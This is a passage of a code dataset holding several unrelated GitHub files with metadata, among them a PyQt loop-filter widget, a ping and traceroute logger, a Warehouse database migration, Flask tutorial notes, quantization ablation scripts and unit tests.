int(self.checkDitherEnabled.isChecked()))\r\n\r\n    def checkLockEnabled_clicked(self):\r\n        self.dev.write_Zynq_register_uint32(self.REG_ADDR_LOCK, int(self.checkLockEnabled.isChecked()))\r\n\r\n    def buttonClearIntegrators_clicked(self):\r\n        self.dev.write_Zynq_register_uint32(self.REG_ADDR_CLR, int(self.buttonClearIntegrators.isChecked()))\r\n\r\n\r\n    def editDitherPeriod_editingFinished(self):\r\n        try:\r\n            val = int(self.editDitherPeriod.text())\r\n            self.dev.write_Zynq_register_uint32(self.REG_ADDR_DITHER_PERIOD, val)\r\n        except ValueError:\r\n            pass\r\n    def editDitherAmpli_editingFinished(self):\r\n        try:\r\n            val = int(self.editDitherAmpli.text())\r\n            self.dev.write_Zynq_register_uint32(self.REG_ADDR_DITHER_AMPLI, val)\r\n        except ValueError:\r\n            pass\r\n\r\n    def fd_coef_to_cutoff(self, coef, fs):\r\n        a = (float(2**24) - float(coef))/float(2**24)\r\n        return (float(fs)*a)/(float(2.0*numpy.pi))\r\n\r\n    def cutoff_to_fd_coef(self, cutoff, fs):\r\n        coef = (float(2.0*numpy.pi)*float(2**24))*float(cutoff)/(float(fs))\r\n        if coef > 2**24-1:\r\n            coef = 2**24-1\r\n        if coef < 0:\r\n            coef = 0\r\n        return coef\r\n\r\n    def editGainFD_editingFinished(self):\r\n        try:\r\n            val = int(self.editGainFD.text())\r\n            self.dev.write_Zynq_register_uint32(self.REG_ADDR_COEF_D_FILT, val)\r\n            self.update_transfer_function()\r\n        except ValueError:\r\n            pass\r\n\r\n    def editGainD_editingFinished(self):\r\n        try:\r\n            val = float(self.editGainD.text())\r\n            (code, act) = self.float_to_hdr_gain_code(val, 0)\r\n            self.editGainD.setText(\"%.16f\"%(act))\r\n            self.dev.write_Zynq_register_uint32(self.REG_ADDR_CMD_IN_D, code)\r\n            self.update_transfer_function()\r\n        except ValueError:\r\n            pass\r\n\r\n    def editGainP_editingFinished(self):\r\n        try:\r\n            val = float(self.editGainP.text())\r\n            (code, act) = self.float_to_hdr_gain_code(val, 0)\r\n            self.editGainP.setText(\"%.16f\"%(act))\r\n            self.dev.write_Zynq_register_uint32(self.REG_ADDR_CMD_IN_P, code)\r\n            self.update_transfer_function()\r\n        except ValueError:\r\n            pass\r\n\r\n    def editGainI_editingFinished(self):\r\n        try:\r\n            val = float(self.editGainI.text())\r\n            (code, act) = self.float_to_hdr_gain_code(val, 3)\r\n            self.editGainI.setText(\"%.16f\"%(act))\r\n            self.dev.write_Zynq_register_uint32(self.REG_ADDR_CMD_IN_I, code)\r\n            self.update_transfer_function()\r\n        except ValueError:\r\n            pass\r\n\r\n    def editGainII_editingFinished(self):\r\n        try:\r\n            val = float(self.editGainII.text())\r\n            (code, act) = self.float_to_hdr_gain_code(val, 6)\r\n            self.editGainII.setText(\"%.16f\"%(act))\r\n            self.dev.write_Zynq_register_uint32(self.REG_ADDR_CMD_IN_II, code)\r\n            self.update_transfer_function()\r\n        except ValueError:\r\n            pass\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n    app = QtGui.QApplication(sys.argv)  \r\n    test = LoopFilterWidget(None, None)\r\n    \r\n    gain = -10\r\n    #test.float_to_hdr_gain_code_v2(gain, 6)\r\n    (code, actual_gain) = test.float_to_hdr_gain_code(gain, 3)\r\n    recomp_gain = test.hdr_gain_code_to_float(code)\r\n    print(\"%g -> 0x%08X -> %g, %g\\n\" % (gain, code, actual_gain, recomp_gain))\r\n    \r\n    app.exec_()\r\n    ","repo_name":"hugoiko/MZILock","sub_path":"Python/LoopFilterWidget.py","file_name":"LoopFilterWidget.py","file_ext":"py","file_size_in_byte":16838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23874597994","text":"import os\n\nimport xtgeo\nfrom xtgeo.common import XTGeoDialog\n\nimport xtgeoapp_convgrd3dfmt.cg3f as xx\n\nxtg = XTGeoDialog()\nlogger = xtg.basiclogger(__name__)\n\nTDX = xtg.tmpdir\nif not 
os.path.exists(TDX):\n    os.makedirs(TDX)\n\nrfile1 = \"tests/data/REEK.EGRID\"\nrfile2 = \"tests/data/REEK.UNRST\"\n\n\ndef test_convert_grid_format_egrid():\n    \"\"\"Convert an ECLIPSE egrid to roff\"\"\"\n\n    outfile = os.path.join(TDX, \"reek_grid.roff\")\n\n    xx.main([\"--file\", rfile1, \"--output\", outfile, \"--mode\", \"grid\", \"--standardfmu\"])\n\n    gg = xtgeo.grid3d.Grid(outfile)\n    assert gg.nactive == 35838\n\n\ndef test_convert_grid_format_restart():\n    \"\"\"Convert an ECLIPSE SOIL from restart to roff\"\"\"\n\n    outfile = os.path.join(TDX, \"reek_grid.roff\")\n\n    xx.main(\n        [\n            \"--file\",\n            rfile2,\n            \"--output\",\n            outfile,\n            \"--mode\",\n            \"restart\",\n            \"--propnames\",\n            \"SOIL\",\n            \"--dates\",\n            \"19991201\",\n            \"--standardfmu\",\n        ]\n    )\n\n    assert 1 == 1\n","repo_name":"equinor/xtgeoapp-convgrd3dfmt","sub_path":"tests/test_convert_grid_format.py","file_name":"test_convert_grid_format.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41732808597","text":"import json\nimport responses\nimport logging\nimport operator\nfrom sqlalchemy import func\nfrom model import db, WordCloud\n\nlogging.basicConfig(level=logging.INFO)\n\n\nasync def search(*args, **kwargs):\n\n    logging.info(f'Received {kwargs}')\n\n    stat_funcs = {\n        'most_used_word': _get_most_used_word,\n        'word_frequency': _get_word_frequency,\n    }\n    func = stat_funcs[kwargs['stat']]\n    params = {}\n\n    query = WordCloud.query\n\n    words = await query.gino.all()\n    if words is None:\n        return responses.not_found()\n    words_dump = [word.dump() for word in words]\n    params['words'] = words_dump\n    response = await func(params)\n    return responses.get(response)\n\n\nasync def _get_most_used_word(params):\n\n    def _get_frequency_dict(words):\n        dictionary = {}\n        for word in words:\n            if word in dictionary.keys():\n                dictionary[word] += 1\n            else:\n                dictionary[word] = 1\n        return dictionary\n\n    db_rows = params['words']\n    words = [row['word'] for row in db_rows]\n    freq_dict = _get_frequency_dict(words)\n    \n    most_frequent = max(freq_dict.items(), key=operator.itemgetter(1))[0]\n    return {'most_used_word': most_frequent}\n\n\nasync def _get_word_frequency(params):\n\n    words_to_freq = await db.select(\n        [\n            WordCloud.word,\n            db.func.count(db.func.distinct(WordCloud.source))\n        ]\n    ).group_by(\n        WordCloud.word\n    ).gino.all()\n\n    return [{k: v for k, v in words_to_freq if v is not None}]","repo_name":"washington-and-lee-mock-convention/mock-con-2020-word-cloud","sub_path":"api/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
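A quick standalone sketch of the most-used-word reduction in the record above (hypothetical counts): max with operator.itemgetter(1) compares the frequencies, and [0] takes the winning word.

import operator
freq = {'alpha': 3, 'beta': 5, 'gamma': 2}  # hypothetical frequency dict
assert max(freq.items(), key=operator.itemgetter(1))[0] == 'beta'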
+{"seq_id":"35583213135","text":"##################################\n# Ping Utility\n### Made by Hiten Sethiya\nimport requests\nimport csv\nimport time\n\nurl = \"http://www.spfld.com/cgi-bin/ping\"\ntrace_url = \"https://api.hackertarget.com/mtr/\"\n\nhosts = [\"flipkart.com\"#Add more\n         ]\nfor host in hosts:\n    query = {'q': host}\n    response = requests.request(\"GET\", trace_url, params=query)\n    with open('ping_traceroutes.txt', 'a') as tr_record:\n        tr_record.write(\"----------------------------------\\n\"+host + \" Local Time :: \" + str(time.strftime(\"%d %b %Y %H:%M:%S\", time.localtime())) + \"\\n\")\n        tr_record.write(response.text)\n    print(\"printed traceroute\")\n    ## Multiple frame sizes are only required for the first host\n    if(host==hosts[0]):\n        sizes = [\"64\", \"128\", \"256\", \"512\", \"1024\", \"2048\"]\n    else:\n        sizes = [\"64\"]\n    for size in sizes:\n        querystring = {\"remote_host\": host, \"dns\": \"on\", \"count\": \"20\", \"size\": size}\n        response = requests.request(\"GET\", url, params=querystring)\n        flag = 1\n        for index, line in enumerate(response.text.splitlines()):\n            if line[0:3] == 'rtt':\n                i = index\n                flag = 0\n        if flag == 1:\n            print(host, size, ' Failed')\n            continue\n        print(host, size, 'Done', 'response = ', response.text.splitlines()[i])\n        with open('ping_results.csv', 'a') as csvfile:\n            fieldnames = ['Host', 'Frame Size','Packets Received','Packets Transmitted','Packet loss','Total Time', 'RTT Min', 'RTT Avg', 'RTT Max', 'RTT Mdev', 'Time']\n            writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n            writer.writerow({'Host': host,\n                             'Frame Size': size,\n                             'Packets Received':response.text.splitlines()[i-1].split()[3].strip(),\n                             'Packets Transmitted':response.text.splitlines()[i-1].split()[0].strip(),\n                             'Packet loss':response.text.splitlines()[i-1].split()[5].strip(),\n                             'Total Time':response.text.splitlines()[i-1].split()[9].strip(),\n                             'RTT Min': response.text.splitlines()[i].split('/')[3].split('=')[1].strip()+'ms',\n                             'RTT Avg': response.text.splitlines()[i].split('/')[4]+'ms',\n                             'RTT Max': response.text.splitlines()[i].split('/')[5]+'ms',\n                             'RTT Mdev': response.text.splitlines()[i].split('/')[6].split()[0].strip()+'ms',\n                             'Time': time.strftime(\"%d %b %Y %H:%M:%S\", time.localtime())\n                             })\nprint('Finished! Check the results in \\'ping_results.csv\\' and \\'ping_traceroutes.txt\\' Enjoy!!')\n","repo_name":"HitenSethiya/Scripts","sub_path":"ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"27679654192","text":"from test_framework import generic_test\n\n\ndef preorder_traversal(tree):\n\n    path, result = [tree], []\n    while path:\n        curr = path.pop()\n        if curr:\n            result.append(curr.data)\n            path += [curr.right, curr.left]\n    return result\n\n\nif __name__ == '__main__':\n    exit(\n        generic_test.generic_test_main(\"tree_preorder.py\", 'tree_preorder.tsv',\n                                       preorder_traversal))\n","repo_name":"CapedHero/python-epi-judge","sub_path":"epi_judge_python_solutions/tree_preorder.py","file_name":"tree_preorder.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"10112660218","text":"from torch.nn.modules import module\nfrom test_vit import *\nfrom quant_layers.conv import MinMaxQuantConv2d\nfrom quant_layers.linear import MinMaxQuantLinear, PTQSLQuantLinear\nfrom quant_layers.matmul import MinMaxQuantMatMul, PTQSLQuantMatMul\nimport matplotlib.pyplot as plt\nfrom utils.net_wrap import wrap_certain_modules_in_net\nfrom tqdm import tqdm\nimport torch.nn.functional as F\nimport pickle as pkl\nfrom itertools import product\nimport types\nfrom utils.quant_calib import HessianQuantCalibrator, QuantCalibrator\nfrom utils.models import get_net\nimport time\n\ndef test_all_ablation(name, cfg_modifier=lambda x: x, calib_size=32):\n    quant_cfg = init_config(\"PTQ4ViT\")\n    quant_cfg = cfg_modifier(quant_cfg)\n\n    net = get_net(name)\n\n    wrapped_modules=net_wrap.wrap_modules_in_net(net,quant_cfg)\n    \n    g=datasets.ViTImageNetLoaderGenerator('/datasets/imagenet','imagenet',32,32,16, kwargs={\"model\":net})\n    test_loader=g.test_loader()\n    calib_loader=g.calib_loader(num=calib_size)\n    \n    quant_calibrator = 
HessianQuantCalibrator(net,wrapped_modules,calib_loader,sequential=False,batch_size=4) # 16 is too big for ViT-L-16\n quant_calibrator.batching_quant_calib()\n\n acc = test_classification(net,test_loader, description=quant_cfg.ptqsl_linear_kwargs[\"metric\"])\n\n print(f\"model: {name} \\n\")\n print(f\"calibration size: {calib_size} \\n\")\n print(f\"bit settings: {quant_cfg.bit} \\n\")\n print(f\"ptqsl_conv2d_kwargs: {quant_cfg.ptqsl_conv2d_kwargs} \\n\")\n print(f\"ptqsl_linear_kwargs: {quant_cfg.ptqsl_linear_kwargs} \\n\")\n print(f\"ptqsl_matmul_kwargs: {quant_cfg.ptqsl_matmul_kwargs} \\n\")\n print(f\"accuracy: {acc} \\n\\n\")\n\nclass cfg_modifier():\n def __init__(self, **kwargs):\n for name, value in kwargs.items():\n setattr(self,name,value)\n\n def __call__(self, cfg):\n # bit setting\n cfg.bit = self.bit_setting\n cfg.w_bit = {name: self.bit_setting[0] for name in cfg.conv_fc_name_list}\n cfg.a_bit = {name: self.bit_setting[1] for name in cfg.conv_fc_name_list}\n cfg.A_bit = {name: self.bit_setting[1] for name in cfg.matmul_name_list}\n cfg.B_bit = {name: self.bit_setting[1] for name in cfg.matmul_name_list}\n\n # conv2d configs\n cfg.ptqsl_conv2d_kwargs[\"n_V\"] = self.linear_ptq_setting[0]\n cfg.ptqsl_conv2d_kwargs[\"n_H\"] = self.linear_ptq_setting[1]\n cfg.ptqsl_conv2d_kwargs[\"metric\"] = self.metric\n cfg.ptqsl_conv2d_kwargs[\"search_round\"] = self.search_round\n cfg.ptqsl_conv2d_kwargs[\"parallel_eq_n\"] = 1 # maximum 7 , reserve 4Gb for gradient \n cfg.ptqsl_conv2d_kwargs[\"init_layerwise\"] = False\n\n # linear configs\n cfg.ptqsl_linear_kwargs[\"n_V\"] = self.linear_ptq_setting[0]\n cfg.ptqsl_linear_kwargs[\"n_H\"] = self.linear_ptq_setting[1]\n cfg.ptqsl_linear_kwargs[\"n_a\"] = self.linear_ptq_setting[2]\n cfg.ptqsl_linear_kwargs[\"metric\"] = self.metric\n cfg.ptqsl_linear_kwargs[\"search_round\"] = self.search_round\n cfg.ptqsl_linear_kwargs[\"parallel_eq_n\"] = 1 # maximum 7, reserve 4Gb for gradient \n cfg.ptqsl_linear_kwargs[\"init_layerwise\"] = False\n\n # matmul configs\n cfg.ptqsl_matmul_kwargs[\"metric\"] = self.metric\n cfg.ptqsl_matmul_kwargs[\"search_round\"] = self.search_round\n cfg.ptqsl_matmul_kwargs[\"parallel_eq_n\"] = 1 # maximum 3!\n cfg.ptqsl_matmul_kwargs[\"init_layerwise\"] = False\n\n # ablation\n cfg.no_softmax = self.no_softmax\n cfg.no_postgelu = self.no_postgelu\n\n return cfg\n\nif __name__=='__main__':\n args = parse_args()\n\n names = [\n \"vit_small_patch16_224\",\n \"vit_base_patch16_224\",\n \"vit_base_patch16_384\",\n ]\n metrics = [\"hessian\", \"cosine\"]\n linear_ptq_settings = [(1,1,1)] # n_V, n_H, n_a\n search_rounds = [3]\n calib_sizes = [32]\n bit_settings = [(8,8), (6,6)] # weight, activation\n no_softmaxs = [True, False]\n no_postgelus = [True, False]\n\n cfg_list = []\n for name, metric, linear_ptq_setting, search_round, calib_size, bit_setting, no_softmax, no_postgelu in product(names, metrics, linear_ptq_settings, search_rounds, calib_sizes, bit_settings, no_softmaxs, no_postgelus):\n cfg_list.append({\n \"name\": name,\n \"cfg_modifier\":cfg_modifier(linear_ptq_setting=linear_ptq_setting, metric=metric, search_round=search_round, bit_setting=bit_setting, no_softmax=no_softmax, no_postgelu=no_postgelu),\n \"calib_size\":calib_size,\n })\n \n if args.multiprocess:\n multiprocess(test_all_ablation, cfg_list, n_gpu=args.n_gpu)\n else:\n for cfg in cfg_list:\n 
test_all_ablation(**cfg)","repo_name":"hahnyuan/PTQ4ViT","sub_path":"example/test_ablation.py","file_name":"test_ablation.py","file_ext":"py","file_size_in_byte":4682,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"3"} +{"seq_id":"43024581564","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nRename tables\n\nRevision ID: 06bfbc92f67d\nRevises: eeb23d9b4d00\nCreate Date: 2018-11-06 04:36:58.531272\n\"\"\"\n\nfrom alembic import op\n\nrevision = \"06bfbc92f67d\"\ndown_revision = \"e612a92c1017\"\n\n\ndef upgrade():\n    # The new verbiage in Warehouse is to call these things projects, but this table\n    # name was inherited from legacy PyPI.\n    op.rename_table(\"packages\", \"projects\")\n    op.execute(\"ALTER TABLE projects RENAME CONSTRAINT packages_pkey TO projects_pkey\")\n    op.execute(\n        \"\"\"\n        ALTER TABLE projects\n        RENAME CONSTRAINT packages_valid_name\n        TO projects_valid_name\n        \"\"\"\n    )\n    op.execute(\n        \"\"\" CREATE OR REPLACE FUNCTION maintain_project_last_serial()\n            RETURNS TRIGGER AS $$\n            DECLARE\n                targeted_name text;\n            BEGIN\n                IF TG_OP = 'INSERT' THEN\n                    targeted_name := NEW.name;\n                ELSEIF TG_OP = 'UPDATE' THEN\n                    targeted_name := NEW.name;\n                ELSIF TG_OP = 'DELETE' THEN\n                    targeted_name := OLD.name;\n                END IF;\n\n                UPDATE projects\n                SET last_serial = j.last_serial\n                FROM (\n                    SELECT max(id) as last_serial\n                    FROM journals\n                    WHERE journals.name = targeted_name\n                ) as j\n                WHERE projects.name = targeted_name;\n\n                RETURN NULL;\n            END;\n            $$ LANGUAGE plpgsql;\n        \"\"\"\n    )\n    op.execute(\n        \"UPDATE row_counts SET table_name = 'projects' WHERE table_name = 'packages'\"\n    )\n\n    # We took the name of these tables from a failed Django port, the new names are\n    # cleaner and fit the overall \"theme\" of our table names better.\n    op.rename_table(\"accounts_user\", \"users\")\n    op.execute(\"ALTER TABLE users RENAME CONSTRAINT accounts_user_pkey TO users_pkey\")\n    op.execute(\n        \"\"\"\n        ALTER TABLE users\n        RENAME CONSTRAINT accounts_user_username_key\n        TO users_username_key\n        \"\"\"\n    )\n    op.execute(\n        \"\"\"\n        ALTER TABLE users\n        RENAME CONSTRAINT accounts_user_valid_username\n        TO users_valid_username\n        \"\"\"\n    )\n    op.execute(\n        \"\"\"\n        ALTER TABLE users\n        RENAME CONSTRAINT packages_valid_name\n        TO users_valid_username_length\n        \"\"\"\n    )\n    op.execute(\n        \"UPDATE row_counts SET table_name = 'users' WHERE table_name = 'accounts_user'\"\n    )\n\n    op.rename_table(\"accounts_email\", \"user_emails\")\n    op.execute(\n        \"\"\"\n        ALTER TABLE user_emails\n        RENAME CONSTRAINT accounts_email_pkey\n        TO user_emails_pkey\n        \"\"\"\n    )\n    op.execute(\n        \"\"\"\n        ALTER TABLE user_emails\n        RENAME CONSTRAINT accounts_email_email_key\n        TO user_emails_email_key\n        \"\"\"\n    )\n    op.execute(\n        \"\"\"\n        ALTER TABLE user_emails\n        RENAME CONSTRAINT accounts_email_user_id_fkey\n        TO user_emails_user_id_fkey\n        \"\"\"\n    )\n    op.execute(\"ALTER INDEX accounts_email_user_id RENAME TO user_emails_user_id\")\n\n    # While the admin prefix on these tables is useful to let us know they are 
specific\n    # to the admins, the warehouse prefix is not. All of these tables in this database\n    # are for Warehouse.\n    op.rename_table(\"warehouse_admin_flag\", \"admin_flags\")\n    op.execute(\n        \"\"\"\n        ALTER TABLE admin_flags\n        RENAME CONSTRAINT warehouse_admin_flag_pkey\n        TO admin_flags_pkey\n        \"\"\"\n    )\n\n    op.rename_table(\"warehouse_admin_squat\", \"admin_squats\")\n    op.execute(\n        \"\"\"\n        ALTER TABLE admin_squats\n        RENAME CONSTRAINT warehouse_admin_squat_pkey\n        TO admin_squats_pkey\n        \"\"\"\n    )\n    op.execute(\n        \"\"\"\n        ALTER TABLE admin_squats\n        RENAME CONSTRAINT warehouse_admin_squat_squattee_id_fkey\n        TO admin_squats_squattee_id_fkey\n        \"\"\"\n    )\n    op.execute(\n        \"\"\"\n        ALTER TABLE admin_squats\n        RENAME CONSTRAINT warehouse_admin_squat_squatter_id_fkey\n        TO admin_squats_squatter_id_fkey\n        \"\"\"\n    )\n\n\ndef downgrade():\n    raise RuntimeError(\"Order No. 227 - Not a step back!\")\n","repo_name":"pypi/warehouse","sub_path":"warehouse/migrations/versions/06bfbc92f67d_rename_tables.py","file_name":"06bfbc92f67d_rename_tables.py","file_ext":"py","file_size_in_byte":4850,"program_lang":"python","lang":"en","doc_type":"code","stars":3382,"dataset":"github-code","pt":"3"}
+{"seq_id":"73981127441","text":"#!coding:utf-8\nfrom flask import request #imported for the request context\nfrom flask import Flask\nfrom flask import make_response #the function used to build Response objects\nfrom flask import redirect #the redirect helper function\nfrom flask import abort #the abort function for error handling\n\napp = Flask(__name__)\n\n#\n# @app.route('/')\n# def index():\n#     user_agent = request.headers.get('User-Agent')\n#     return '<h1>Your User-Agent is %s</h1>' % user_agent\n\n#Flask uses contexts to make some objects temporarily global; here request is treated as a global variable.\n#Flask uses contexts to make particular variables globally accessible inside one thread without interfering with other threads.\n#Flask has two kinds of context: the application context (current_app, g) and the request context (request, session).\n\n\n# @app.route('/404')\n# def indexx():\n#     return \"<h1>Bad Request</h1>\", 404\n#If a view function needs to return a response with a different status code, the number can be added as a second return value after the response text. ##404 means the request is invalid\n#A response returned by a view can also take a third argument, a dict of headers, which is added to the HTTP response.\n\n#Flask view functions can also return Response objects. make_response() accepts 1, 2 or 3 arguments (the same as a view's return values) and returns a\n#Response object. Sometimes this conversion needs to happen inside the view function, so that methods can then be called on the response object to configure it further.\n\n#The example below creates a response object and sets a cookie on it\n\n\n@app.route('/')\ndef index():\n    response = make_response('<h1>This document carries a cookie</h1>') #written like a directly returned response; a status code can be added.\n    response.set_cookie('answer', '42') #set a cookie on the response; the matching cookie can be seen in the browser\n    return response #return the response object directly.\n\n#There is a special response type called a redirect. It has no page body; it only gives the browser a new address from which to load a new page. It is often used with web forms.\n#A redirect is usually marked with status code 302, with the target address supplied in the Location header. A redirect can be produced with the 3-value return form, or set on a Response object.\n#Because it is used so often, Flask provides the redirect() helper function for generating this kind of response. Example:\n\n\n@app.route('/red')\ndef red():\n    return redirect('http://www.zhihu.com') # redirects straight to the URL in the string; not yet sure whether redirecting within the site or to an error page such as 404 is possible\n\n\n# Another special response is produced by abort, used for error handling. In the example below, if no user matches the dynamic URL parameter id, status code 404 is returned\n\n\nload_user = ('lee')\n\n\n@app.route('/user/<id>')\ndef get_userid(id):\n    user = load_user(id)\n    if not user:\n        abort(404)\n    return '<h1>Hello %s</h1>' % user.name # abort can handle errors, but the data type and format of load_user are unclear for now, so this could not be debugged successfully.\n\n# Note that abort does not hand control back to the function that called it; instead it raises an exception that hands control to the web server.\n\n\n# app.add_url_rule('/head') #app.add_url_rule is another syntax for defining a URL; not yet understood, shelved.!!!!\n# def head():\n#     return 'hello'\n\nif __name__ == '__main__':\n    app.run(debug=True)","repo_name":"tiancegit/flasky","sub_path":"note/testcode.py","file_name":"testcode.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
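A minimal companion sketch for the cookie example in the notes above, assuming the same app object: request.cookies is the read-side counterpart of set_cookie.

@app.route('/answer')
def answer():
    value = request.cookies.get('answer', 'not set')  # reads the cookie set by index()
    return '<h1>answer = %s</h1>' % value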
+{"seq_id":"30532864470","text":"import csv\nimport json\n\ndef export_session_to_csv(url: str, title: str, output: list, qa_list: list, path='data/export_csvs/temp.csv') -> None:\n    '''\n    data is a dict with keys 'subject' and 'content'\n    We want CSVs to be rectangular, i.e. each row has the same number of columns.\n    We therefore first make a pass over the data to find the maximum number of columns.\n    '''\n\n    max_col = 2\n    for palette in output:\n        for d in palette['text']:\n            key = d['key']\n            val = d['value']\n            if isinstance(val, list):\n                max_col = max(max_col, len(val[0])+1)\n    if len(qa_list) > 0:\n        max_col = max(max_col, 3)\n    \n    with open(path, 'w', newline='') as f:\n        writer = csv.writer(f)\n        writer.writerow(['Title', title]+['']*(max_col-2))\n        \n        for i, palette in enumerate(output):\n            writer.writerow(['']*(max_col)) # writer.writerow(['Entry ' + str(i+1)]+['']*(max_col-1))\n            writer.writerow([palette['title']]+['']*(max_col-1))\n            writer.writerow(['URL', palette['url']]+['']*(max_col-2))\n            text_output = palette['text']\n            if isinstance(text_output, str):\n                writer.writerow(['Summary', text_output]+['']*(max_col-2))\n                writer.writerow(['']*max_col)\n            # in case we have a \"note\" where text_output = [{'key': '', 'value': 'note...'}], we may want to print it differently; this commented block captures it; inactive\n            #elif len(text_output) == 1 and 'key' in text_output[0] and text_output[0]['key'] == '':\n            #    writer.writerow([text_output[0]['value']]+['']*(max_col-1))\n            #    writer.writerow(['']*max_col)\n            else:\n                for d in text_output:\n                    key = d['key']\n                    val = d['value']\n                    # if val is string, write it\n                    if isinstance(val, str):\n                        writer.writerow([key, val]+['']*(max_col-2))\n                    # if val is list, write each element\n                    elif isinstance(val, list):\n                        writer.writerow([key] + val[0] +['']*(max_col-1-len(val[0])))\n                        for v in val[1:]:\n                            writer.writerow([''] + v + ['']*(max_col-1-len(val[0])))\n\n        for j, qa in enumerate(qa_list):\n            question, answer = qa[0], qa[1]\n            if j == 0:\n                writer.writerow(['Q&A']+[question, answer] + ['']*(max_col-3))\n            else:\n                writer.writerow(['']+[question, answer] + ['']*(max_col-3))\n        \n        writer.writerow(['']*max_col)\n\n\ndef export_divider_to_csv(data: dict, path='data/export_csvs/temp.csv') -> None:\n    '''\n    data is a dict with keys 'subject' and 'content'.\n    We want CSVs to be rectangular, i.e. each row has the same number of columns.\n    We therefore first make a pass over the data to find the maximum number of columns.\n    '''\n\n    max_col = 3\n    for session in data['content']:\n        if isinstance(session['long_summary'], str):\n            continue\n        for entry in session['long_summary']:\n            for d in entry['text']:\n                key = d['key']\n                val = d['value']\n                if isinstance(val, list):\n                    max_col = max(max_col, len(val[0])+2)\n        if len(session['qa_list']) > 0:\n            max_col = max(max_col, 4)\n    \n    with open(path, 'w', newline='') as f:\n        writer = csv.writer(f)\n        writer.writerow(['SUBJECT', data['subject']]+['']*(max_col-2))\n        writer.writerow(['']*max_col)\n\n        for i, session in enumerate(data['content']):\n            writer.writerow(['Session ' + str(i+1), 'Title', session['title']]+['']*(max_col-3))\n            # writer.writerow(['', 'URL', session['url']]+['']*(max_col-3))\n            \n            if isinstance(session['long_summary'], str):\n                writer.writerow(['', 'Summary', session['long_summary']]+['']*(max_col-3))\n                writer.writerow(['']*max_col)\n                continue\n            \n            for j, palette in enumerate(session['long_summary']):\n                writer.writerow(['']*max_col) # writer.writerow([''] + ['Entry ' + str(j+1)]+['']*(max_col-1))\n                writer.writerow([''] + [palette['title']]+['']*(max_col-2))\n                writer.writerow([''] + ['URL', palette['url']]+['']*(max_col-3))\n\n                for d in palette['text']:\n                    key = d['key']\n                    val = d['value']\n                    \n                    # if val is string, write it\n                    if isinstance(val, str):\n                        writer.writerow(['', key, val]+['']*(max_col-3))\n                    # if val is list, write each element\n                    elif isinstance(val, list):\n                        writer.writerow(['', key] + val[0] +['']*(max_col-2-len(val[0])))\n                        for v in val[1:]:\n                            writer.writerow(['', ''] + v + ['']*(max_col-2-len(val[0])))\n\n            for j, qa in enumerate(session['qa_list']):\n                question, answer = qa[0], qa[1]\n                if j == 0:\n                    writer.writerow(['', 'Q&A']+[question, answer] + ['']*(max_col-4))\n                else:\n                    writer.writerow(['', '']+[question, answer] + ['']*(max_col-4))\n            \n            writer.writerow(['']*max_col)\n\n","repo_name":"bnitsan/essence_backend","sub_path":"server_src/export_utils.py","file_name":"export_utils.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29028745597","text":"import pytest\nimport uuid\n\nfrom unittest.mock import patch\n\nfrom intranet.femida.src.candidates.bulk_upload.choices import CANDIDATE_UPLOAD_MODES\nfrom intranet.femida.src.candidates.tasks import upload_from_beamery_task\n\nfrom intranet.femida.tests import factories as f\nfrom intranet.femida.tests.utils import ContainsDict\n\n\n# Use a pre-made dictionary so that the tests are predictable\nBEAMERY_IDS = {\n    'known': str(uuid.uuid4()),\n    'unknown': str(uuid.uuid4()),\n}\n\n\n@pytest.mark.parametrize('beamery_id, femida_id, expected_original, expected_mode', (\n    # A new candidate is created via Beamery. An unknown beamery id is given; the femida id is absent\n    pytest.param('unknown', None, None, CANDIDATE_UPLOAD_MODES.create, id='create'),\n    # An existing candidate is changed via Beamery. Beamery already knows the femida id\n    pytest.param('unknown', 100500, 100500, CANDIDATE_UPLOAD_MODES.merge, id='merge'),\n    # An existing candidate is changed via Beamery. Beamery does not know the femida id yet.\n    # For example, if the candidate was edited on the Beamery side\n    # after creation, before Femida sent back a reply message with its id.\n    pytest.param('known', None, 100500, CANDIDATE_UPLOAD_MODES.merge, id='merge-by-beamery-id'),\n))\n@patch('intranet.femida.src.candidates.bulk_upload.uploaders.CandidateBeameryUploader')\ndef test_upload_from_beamery_task(mocked_uploader, beamery_id, femida_id,\n                                  expected_original, expected_mode):\n    f.CandidateFactory(id=100500, beamery_id=BEAMERY_IDS['known'])\n    beamery_id = BEAMERY_IDS[beamery_id]\n    raw_data = {\n        'id': beamery_id,\n        'integrations': {\n            'brassring': {'id': femida_id},\n        },\n    }\n    expected_serialized_data = {\n        'beamery_id': beamery_id,\n        'original': expected_original,\n    }\n\n    upload_from_beamery_task(data=[raw_data])\n\n    mocked_uploader.assert_called_once_with(expected_mode, [ContainsDict(expected_serialized_data)])\n    mocked_uploader().upload.assert_called_once_with()\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/tests/unit/candidates/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23768219345","text":"from matplotlib import pyplot as 